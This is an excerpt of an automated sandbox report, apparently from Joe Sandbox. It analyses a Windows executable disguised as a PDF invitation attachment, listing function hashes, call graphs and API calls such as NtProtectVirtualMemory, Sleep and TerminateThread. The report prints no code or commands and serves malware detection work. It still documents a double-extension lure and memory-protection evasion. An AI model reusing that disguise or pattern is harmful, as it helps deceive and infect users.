                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cdd10145b09d2c834afd0df421ee6518a2b0aea7b3575a032731e4cdbcc47bcf
                        • Instruction ID: 5e2a89257822b4bc8fc00e439a696db3d2e4fc5f2271e35671b46d9b11ed2fa1
                        • Opcode Fuzzy Hash: cdd10145b09d2c834afd0df421ee6518a2b0aea7b3575a032731e4cdbcc47bcf
                        • Instruction Fuzzy Hash: CF21E472945344CFCBB98E6188B16EBB6E2AF99300FD5051FC88F5BA60C7306846CA15
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A750E, Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7be764258481bd16bb73e2168d92f65becf609332be38a3f199e87a70ecf8d3d
                        • Instruction ID: 6cbf2d44ca224d7abdc48782334fa86213983a8fc6a42d7bb5081f49b065dbfc
                        • Opcode Fuzzy Hash: 7be764258481bd16bb73e2168d92f65becf609332be38a3f199e87a70ecf8d3d
                        • Instruction Fuzzy Hash: BB113B32619350DFD7644E78CD127EF7AE2AF44740F92450EDC8AA7510C7784A41DB42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AC6DF, Relevance: .0, Instructions: 46COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e074da92b29fd0b43bc81a8c3f6ad9e0461f775d20825e976f3b275e955d7c76
                        • Instruction ID: e0d9c04476585a2f7912d6037992f8ea3ef0afdb823f3fb88fb288351a430baf
                        • Opcode Fuzzy Hash: e074da92b29fd0b43bc81a8c3f6ad9e0461f775d20825e976f3b275e955d7c76
                        • Instruction Fuzzy Hash: D9113275210789DFDB65CE98C8A4BDA73E1BF58740F96846BEC09DB211D770EA41EB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020A8EE2, Relevance: .0, Instructions: 7COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b1fb9562bd505e2d3cdadd7d32cea7f6bf11656afa665952710d3a0e39326749
                        • Instruction ID: 35edca3dc2ce57d933155bc908a27463919aa6aae59b3d44164f52217b77a870
                        • Opcode Fuzzy Hash: b1fb9562bd505e2d3cdadd7d32cea7f6bf11656afa665952710d3a0e39326749
                        • Instruction Fuzzy Hash: 3DC092F6612A809FFF06CF08C592B0173A0FB05A48B1804E4E002CFB12C224E910CA41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ABA35, Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2472c570d5a871a6d99c4efd6b31b2918c8a116bdd6085ba3b5e0eb7161aa0c7
                        • Instruction ID: 563963354098d4439e94d7fa85fd755a9c3186ae39d1e79f3fbef03a14104451
                        • Opcode Fuzzy Hash: 2472c570d5a871a6d99c4efd6b31b2918c8a116bdd6085ba3b5e0eb7161aa0c7
                        • Instruction Fuzzy Hash: 8FB09238219740CFC645CE08C190F8073F0BB14644FC20490EC029BA11C328ED01C900
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020ACEC8, Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                        • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                        • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 020AEE11, Relevance: .0, Instructions: 4COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_20a0000_Anexo I e II do convite#U00b7pdf.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: eab03748100dbdd8bb253b81699f233c0b24a20319c007425ff7d469cf8588e1
                        • Instruction ID: 82650a5c83ce782b0d0e82b42ad5ba2f49e9e30568b1a79b78be9b30d4946f49
                        • Opcode Fuzzy Hash: eab03748100dbdd8bb253b81699f233c0b24a20319c007425ff7d469cf8588e1
                        • Instruction Fuzzy Hash:
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Analysis Process: Anexo I e II do convite#U00b7pdf.exe PID: 1304 Parent PID: 3144 Anexo I e II do convite#U00b7pdf.exeCOMMON

                        Execution Graph

                        Execution Coverage:6.1%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:28
                        Total number of Limit Nodes:0

                        Graph

                        execution_graph 328 56f794 329 56f7dc 328->329 329->329 330 56f83b TerminateThread 329->330 331 56f8b3 330->331 332 56fb82 334 56fbb4 332->334 333 56fd5d 334->333 335 56fcab NtProtectVirtualMemory 334->335 336 56fd09 335->336 300 56fdb3 301 56fdb8 300->301 302 56fdd4 Sleep 301->302 303 56fddb NtProtectVirtualMemory 301->303 305 56fdd9 302->305 306 56fe4d 303->306 305->305 344 56fe33 345 56fe35 NtProtectVirtualMemory 344->345 346 56fe4d 345->346 307 56f83f TerminateThread 308 56f8b3 307->308 309 56fcaf NtProtectVirtualMemory 310 56fd09 309->310 321 56fd7c 322 56fd81 321->322 323 56fdd4 Sleep 322->323 324 56fddb NtProtectVirtualMemory 322->324 326 56fdd9 323->326 327 56fe4d 324->327 326->326

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_0056F957 1 Function_0056FD53 2 Function_0056FA53 3 Function_00570051 4 Function_0056FA5F 5 Function_0056FD47 6 Function_0056FB47 11 Function_0056FB7D 6->11 7 Function_0056FF49 8 Function_0056FA77 9 Function_00570172 10 Function_0056FD7C 10->6 12 Function_0056FF7A 13 Function_0056FE7B 14 Function_0056F97B 15 Function_0056FC7B 16 Function_0056FE63 17 Function_0056F963 18 Function_0056FD60 19 Function_0056FE60 20 Function_0056FE6F 21 Function_0056F96F 22 Function_0056FA6B 23 Function_0056FC13 24 Function_0056FA13 25 Function_0056FC1F 26 Function_0056FA1F 27 Function_0056FE1B 28 Function_0056F81B 29 Function_0056FB1B 30 Function_0056F907 31 Function_0056FD07 32 Function_0056FE07 33 Function_0056FC01 34 Function_0057000F 35 Function_0056FE0F 36 Function_0056FB0F 37 Function_0056F80B 38 Function_0056FA0B 39 Function_0056FB36 40 Function_0056FA37 41 Function_0056F833 42 Function_0056FE33 42->6 43 Function_0056F83F 44 Function_0056FD3B 45 Function_00570226 46 Function_0056FE27 47 Function_0056F827 48 Function_0056FB27 49 Function_0057012E 50 Function_0056FA2B 51 Function_0056FC2B 51->6 95 Function_0056FAAE 51->95 52 Function_0056FD2B 53 Function_0056FD29 54 Function_0056F8D3 55 Function_0056FADB 56 Function_0056F9DB 57 Function_0056FCDB 58 Function_0056F9C3 59 Function_0056FACF 60 Function_0056F9CF 61 Function_0056FBC9 62 Function_0056FBF7 62->6 62->95 63 Function_0056FAF3 64 Function_0056FBF1 64->6 64->95 65 Function_0056FAFF 66 Function_0056FCFB 67 Function_0056F8FB 68 Function_0056FAE7 69 Function_0056FCE3 70 Function_0056F8E3 71 Function_005701E2 72 Function_0056FCEF 73 Function_0056F8EF 74 Function_0056FB97 75 Function_0056FC97 76 Function_0056F794 77 Function_00570194 78 Function_0056F893 79 Function_0056F89F 80 Function_0056FD9B 81 Function_0056FE87 82 Function_0056FB82 82->6 82->95 83 Function_0056FF82 84 Function_0056F883 85 Function_0056FD81 85->6 86 Function_0056FD8F 87 Function_0056FB8B 88 Function_0056FC8B 89 Function_0056FDB3 89->6 90 Function_0056FABF 91 Function_0056FBBD 92 Function_0056FDA7 93 Function_0056FBA3 94 Function_0056FCA3 96 Function_0056FBAF 96->6 96->95 97 Function_0056FCAF 98 Function_0056F8AB

                        Executed Functions

                        Function 0056FD81, Relevance: 3.0, APIs: 2, Instructions: 34sleepnativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • Sleep.KERNEL32(00000005), ref: 0056FDD6
                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FE45
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectSleepVirtual
                        • String ID:
                        • API String ID: 3235210055-0
                        • Opcode ID: 5be3d525e06e52c4cc7b4e5797bf069b3a4debb70341a3ab413e203843c307b7
                        • Instruction ID: 6a034b89a18d7ba1ed5eec2cfa33c3da524af8e3e990aa7f067b9c46f5ea7084
                        • Opcode Fuzzy Hash: 5be3d525e06e52c4cc7b4e5797bf069b3a4debb70341a3ab413e203843c307b7
                        • Instruction Fuzzy Hash: 4D01A2B18013819FE7445F34E88CB19BBB4BF0832AF218195F1214F1B2C3B48980CF11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FBF7, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 57 56fbf7-56fc41 59 56fc47-56fc4a 57->59 60 56fd5d-56fd79 57->60 59->60 61 56fc50-56fc60 call 56faae call 56fb47 59->61 61->60 66 56fc66-56fc69 61->66 66->60 67 56fc6f-56fd26 NtProtectVirtualMemory 66->67
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FCD4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: c2313035f1bdb666098b298efa816b773caae559e1a12feec8dbbdbdcf08c558
                        • Instruction ID: 5854daa56e989aeec4ca8d89cb6c2447fb5c69ba7fd08cdd0ad3f1a26b3535af
                        • Opcode Fuzzy Hash: c2313035f1bdb666098b298efa816b773caae559e1a12feec8dbbdbdcf08c558
                        • Instruction Fuzzy Hash: C81125B19043029FD7109F74EA89A5A3F29FF2A354F2106B1E906DB566C370D880CB31
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FBAF, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 70 56fbaf-56fc41 75 56fc47-56fc4a 70->75 76 56fd5d-56fd79 70->76 75->76 77 56fc50-56fc60 call 56faae call 56fb47 75->77 77->76 82 56fc66-56fc69 77->82 82->76 83 56fc6f-56fd26 NtProtectVirtualMemory 82->83
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FCD4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 4c6b1228dd49c02c51e153d010839f7b6af0ecf419028da3996af12beb0dda87
                        • Instruction ID: 52a5d8ddeceff246e6051a2daff68253b4828a33ac1e7508416979b1f9376d3f
                        • Opcode Fuzzy Hash: 4c6b1228dd49c02c51e153d010839f7b6af0ecf419028da3996af12beb0dda87
                        • Instruction Fuzzy Hash: FC11C0B0904306DFD7109F64EA89A597F29FF2A310F2102B5E9469B276C370E8808B25
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FB82, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 86 56fb82-56fc41 91 56fc47-56fc4a 86->91 92 56fd5d-56fd79 86->92 91->92 93 56fc50-56fc60 call 56faae call 56fb47 91->93 93->92 98 56fc66-56fc69 93->98 98->92 99 56fc6f-56fd26 NtProtectVirtualMemory 98->99
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FCD4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 6640ace4e82dd3c144e24e81c293687b840b2705a40b2665fef3344e680044d5
                        • Instruction ID: 8e42bbfc15fe7b1445cfccf447054e8c18fddecd26ce1aeb982c8ba090de7ea2
                        • Opcode Fuzzy Hash: 6640ace4e82dd3c144e24e81c293687b840b2705a40b2665fef3344e680044d5
                        • Instruction Fuzzy Hash: 5901C0B09043029FD7009F64EA89A593F29FF2A310F2102B1E9469B276C770E8808B22
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FBF1, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 102 56fbf1-56fc41 106 56fc47-56fc4a 102->106 107 56fd5d-56fd79 102->107 106->107 108 56fc50-56fc60 call 56faae call 56fb47 106->108 108->107 113 56fc66-56fc69 108->113 113->107 114 56fc6f-56fd26 NtProtectVirtualMemory 113->114
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FCD4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 709c8420d96130ee12871b75abb381e2e95430745e41f44d47e06826b718a401
                        • Instruction ID: 30867cbc804bd3449b384a48f2c4da9de71657abce2ac2e928129bd5cf4be139
                        • Opcode Fuzzy Hash: 709c8420d96130ee12871b75abb381e2e95430745e41f44d47e06826b718a401
                        • Instruction Fuzzy Hash: F30192B05043069FD715DF74EA89A593F29FF2A350F1103B1E9469B176C770E8808B65
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FC2B, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 117 56fc2b-56fc41 119 56fc47-56fc4a 117->119 120 56fd5d-56fd79 117->120 119->120 121 56fc50-56fc60 call 56faae call 56fb47 119->121 121->120 126 56fc66-56fc69 121->126 126->120 127 56fc6f-56fd26 NtProtectVirtualMemory 126->127
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FCD4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: bb7727efcf1cb202d4e524d7f66eb595b3d1c04fb594b7e18864cd93ca5f31e3
                        • Instruction ID: 763c26085c79ff30482b381f71d7ce9d369919c05b646bd66ef8fd9f0fb05c71
                        • Opcode Fuzzy Hash: bb7727efcf1cb202d4e524d7f66eb595b3d1c04fb594b7e18864cd93ca5f31e3
                        • Instruction Fuzzy Hash: C401B1B05003029FDB009F74EA88B593B29BF2A310F1203B5E9469B1B6C370D880CB25
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FCAF, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 130 56fcaf-56fcd7 NtProtectVirtualMemory 131 56fd09-56fd26 130->131
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FCD4
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 0c70fa5c29f1f62cb907809f2a4f3aee4a527ac9fae4e24451ba12845344d6b2
                        • Instruction ID: 55cd897c7293cbe9c60870018c6fb7c583e4e8c932fc9c43793f5686101b7e7b
                        • Opcode Fuzzy Hash: 0c70fa5c29f1f62cb907809f2a4f3aee4a527ac9fae4e24451ba12845344d6b2
                        • Instruction Fuzzy Hash: 53E09272504282CED7109F785A4C6E57E18AF37239B6442B5DCA99B0D6D760C08AD610
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FE33, Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 132 56fe33-56fe54 NtProtectVirtualMemory call 56fb47
                        APIs
                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FE45
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectVirtual
                        • String ID:
                        • API String ID: 2706961497-0
                        • Opcode ID: 3193e9699b415009287fd9c53f856f106077ef5d5c0158458ea717d0b8041cd2
                        • Instruction ID: 828b071f48dee84002da8a3aaa2a27393446388e88f46b2b370611a0b56a0aec
                        • Opcode Fuzzy Hash: 3193e9699b415009287fd9c53f856f106077ef5d5c0158458ea717d0b8041cd2
                        • Instruction Fuzzy Hash: 94D012318027809FD3445F35E41C34EFBF5BF183A6B224499A0624B47983B986C8CF42
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056F794, Relevance: 1.6, APIs: 1, Instructions: 139threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 12 56f794-56f7d9 13 56f7dc-56f7f0 12->13 13->13 14 56f7f2-56f8cb TerminateThread 13->14 18 56f8d1-56f91c 14->18 19 56fa8f-56faab 14->19 18->19 21 56f922-56f926 18->21 21->19 22 56f92c-56f930 21->22 22->19 23 56f936-56f93a 22->23 23->19 24 56f940-56f944 23->24 24->19 25 56f94a-56f94e 24->25 25->19 26 56f954-56f99c 25->26 26->19 28 56f9a2-56f9b3 26->28 29 56f9b4-56f9f7 28->29 31 56fa06-56fa8c 29->31 32 56f9f9-56f9fd 29->32 32->19 34 56fa03-56fa04 32->34 34->29
                        APIs
                        • TerminateThread.KERNEL32(-81F576FA,-A942D339), ref: 0056F87B
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: ee899a9b325151c229c15b6baa205e42282f00f5ff11727f1a3eeda38ed5b412
                        • Instruction ID: 6593f157e6c0876c891f2a578e2b5bc732759effd8ecfa07c9c22963399e90d5
                        • Opcode Fuzzy Hash: ee899a9b325151c229c15b6baa205e42282f00f5ff11727f1a3eeda38ed5b412
                        • Instruction Fuzzy Hash: D1314871A043468FDBA48E94F5947F53FA2BF59354F2481BDC89E4B2A2DB708D84C712
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056F83F, Relevance: 1.6, APIs: 1, Instructions: 72threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 36 56f83f-56f881 TerminateThread 37 56f8b3-56f8cb 36->37 39 56f8d1-56f91c 37->39 40 56fa8f-56faab 37->40 39->40 42 56f922-56f926 39->42 42->40 43 56f92c-56f930 42->43 43->40 44 56f936-56f93a 43->44 44->40 45 56f940-56f944 44->45 45->40 46 56f94a-56f94e 45->46 46->40 47 56f954-56f99c 46->47 47->40 49 56f9a2-56f9b3 47->49 50 56f9b4-56f9f7 49->50 52 56fa06-56fa8c 50->52 53 56f9f9-56f9fd 50->53 53->40 55 56fa03-56fa04 53->55 55->50
                        APIs
                        • TerminateThread.KERNEL32(-81F576FA,-A942D339), ref: 0056F87B
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: TerminateThread
                        • String ID:
                        • API String ID: 1852365436-0
                        • Opcode ID: 8b45adc8c2f5c0f90777312d15b6d8da3769310e79fd3216e77977f1cc7fd221
                        • Instruction ID: 7c2db30be79336ce61ef3b38b0fd0e3702c79cdacffe8d2fcf151857fcaf91c3
                        • Opcode Fuzzy Hash: 8b45adc8c2f5c0f90777312d15b6d8da3769310e79fd3216e77977f1cc7fd221
                        • Instruction Fuzzy Hash: 9521D730E042469FDBA48F94F554BB53FA27F59324F2481BDC06A4B2A2CB754DC5CB02
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FD7C, Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 136 56fd7c-56fdc5 call 56fb47 141 56fdc7 136->141 142 56fdcc-56fdd2 136->142 141->142 143 56fdd4-56fdd6 Sleep 142->143 144 56fddb-56fe54 NtProtectVirtualMemory call 56fb47 142->144 146 56fdd9 143->146 146->146
                        APIs
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: d2535e7c802099be23e7c7d4a6686303066cf7df003c9b671ad6554fb3ac2501
                        • Instruction ID: cd26ab54a6e77da76677916d83a2484ecbf8cdded6461d33789eea4109d5cbbe
                        • Opcode Fuzzy Hash: d2535e7c802099be23e7c7d4a6686303066cf7df003c9b671ad6554fb3ac2501
                        • Instruction Fuzzy Hash: E8D012B19043418FD740AF20D18DF14BFB0BF04319F1585A5EA194F5A38760D840CB11
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0056FDB3, Relevance: 1.3, APIs: 1, Instructions: 14sleepnativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 149 56fdb3-56fdc5 151 56fdc7 149->151 152 56fdcc-56fdd2 149->152 151->152 153 56fdd4-56fdd6 Sleep 152->153 154 56fddb-56fe48 NtProtectVirtualMemory call 56fb47 152->154 156 56fdd9 153->156 158 56fe4d-56fe54 154->158 156->156
                        APIs
                        • Sleep.KERNEL32(00000005), ref: 0056FDD6
                        • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056FE45
                        Memory Dump Source
                        • Source File: 0000000D.00000002.419225582.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_13_2_56f000_Anexo I e II do convite#U00b7pdf.jbxd
                        Similarity
                        • API ID: MemoryProtectSleepVirtual
                        • String ID:
                        • API String ID: 3235210055-0
                        • Opcode ID: 752d55bdf6140772bd11f38f6c471881ba2aa9a46a037fccd6eca844a43bc88d
                        • Instruction ID: cb149af1118ee6d37b6cee931540af1475f18880762b87e9d06cdd6588f79618
                        • Opcode Fuzzy Hash: 752d55bdf6140772bd11f38f6c471881ba2aa9a46a037fccd6eca844a43bc88d
                        • Instruction Fuzzy Hash: 42D0E270A45380CFD3809F14D088B10BBB1AF18319F568499E6681F5A283309880CB10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions